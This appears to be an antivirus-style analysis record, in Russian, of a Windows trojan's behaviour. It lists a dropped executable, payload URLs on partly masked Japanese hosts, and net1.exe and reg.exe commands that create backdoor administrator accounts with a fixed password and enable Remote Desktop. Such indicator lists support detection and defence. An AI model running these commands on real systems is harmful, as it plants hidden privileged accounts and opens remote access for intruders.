Техническая информация
- '%TEMP%\spvvt32.exe'
- '%TEMP%\spvvt32.exe' (загружен из сети Интернет)
- '<SYSTEM32>\net1.exe' group "domain admins" DHCP /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" DHCP /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s DHCP /add
- '<SYSTEM32>\net1.exe' user DHCP /active:yes
- '<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk
- '<SYSTEM32>\net1.exe' user DHCP /expires:never
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" sysadm /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' group "domain admins" sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk
- '<SYSTEM32>\net1.exe' user sysadm /expires:never
- '<SYSTEM32>\net1.exe' user sysadm /active:yes
- AVP.EXE
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\logo1[1].png
- %TEMP%\spvvt32.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\last3[1].png
- %TEMP%\draft.ini
- 'za###.sakura.ne.jp':80
- 'ca####t.client.jp':80
- za###.sakura.ne.jp/logo1.png
- ca####t.client.jp/img/last3.png
- DNS ASK za###.sakura.ne.jp
- DNS ASK ca####t.client.jp
- ClassName: 'Shell_TrayWnd' WindowName: ''